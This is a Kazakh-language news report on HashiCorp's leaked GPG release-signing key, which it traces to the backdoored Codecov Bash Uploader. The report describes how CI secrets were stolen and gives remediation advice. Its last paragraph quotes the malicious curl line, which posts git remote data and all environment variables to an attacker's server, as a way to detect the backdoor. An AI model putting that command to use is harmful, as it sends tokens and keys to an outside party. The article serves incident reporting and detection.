Vagrant, Packer, Nomad және Terraform ашық бастапқы құралдарын жасаумен танымал HashiCorp шығарылымдарды тексеретін сандық қолтаңбаларды жасау үшін пайдаланылатын жеке GPG кілтінің ағып кетуін жариялады. GPG кілтіне қол жеткізген шабуылдаушылар дұрыс сандық қолтаңбамен растау арқылы HashiCorp өнімдеріне жасырын өзгерістер енгізуі мүмкін. Бұл ретте компания аудит барысында мұндай өзгертулер енгізу әрекетінің ізі анықталмағанын мәлімдеді.
Қазіргі уақытта бұзылған GPG кілтінің күші жойылды және оның орнына жаңа кілт енгізілді. Мәселе тек SHA256SUM және SHA256SUM.sig файлдарын пайдалану арқылы тексеруге әсер етті және releases.hashicorp.com арқылы жеткізілетін Linux DEB және RPM бумалары үшін сандық қолтаңбаларды генерациялауға, сондай-ақ macOS және Windows (AuthentiCode) үшін шығарылымды растау тетіктеріне әсер етпеді. .
Ақпараттың ағып кетуі үздіксіз интеграциялық жүйелерден қамту есептерін жүктеп алуға арналған инфрақұрылымда Codecov Bash Uploader (codecov-bash) сценарийін пайдалану салдарынан орын алды. Codecov компаниясына жасалған шабуыл кезінде көрсетілген сценарийге бэкдор жасырылды, ол арқылы парольдер мен шифрлау кілттері шабуылдаушылардың серверіне жіберілді.
Бұзылу үшін шабуылдаушылар Codecov.io сайтынан таратылған Bash Uploader сценарийіне өзгертулер енгізу үшін қажет GCS (Google Cloud Storage) қол жеткізу деректерін шығаруға мүмкіндік беретін Codecov Docker кескінін жасау процесіндегі қатені пайдаланды. веб-сайт. Өзгерістер 31 қаңтарда қайтадан енгізілді, екі ай бойы байқалмады және шабуылдаушыларға тұтынушы үздіксіз интеграциялық жүйе орталарында сақталған ақпаратты шығаруға мүмкіндік берді. Қосылған зиянды кодты пайдалана отырып, шабуылдаушылар сынақтан өткен Git репозиторийі және барлық орта айнымалылары, соның ішінде токендер, шифрлау кілттері және Amazon Web Services және GitHub сияқты қолданба кодына, репозиторийлерге және қызметтерге кіруді ұйымдастыру үшін үздіксіз интеграциялық жүйелерге жіберілетін құпия сөздер туралы ақпаратты ала алады.
Тікелей қоңырауға қосымша, Codecov Bash Uploader сценарийі Codecov-action (Github), Codecov-circleci-orb және Codecov-bitrise-step сияқты басқа жүктеп салушылардың бөлігі ретінде пайдаланылды, олардың пайдаланушылары да мәселеге әсер етеді. Codecov-bash және қатысты өнімдердің барлық пайдаланушыларына өздерінің инфрақұрылымдарын тексеру, сондай-ақ құпия сөздер мен шифрлау кілттерін өзгерту ұсынылады. Сценарийде бэкдордың болуын curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” жолының болуы арқылы тексеруге болады http:// /жүктеп салу/v2 || рас
Ақпарат көзі: opennet.ru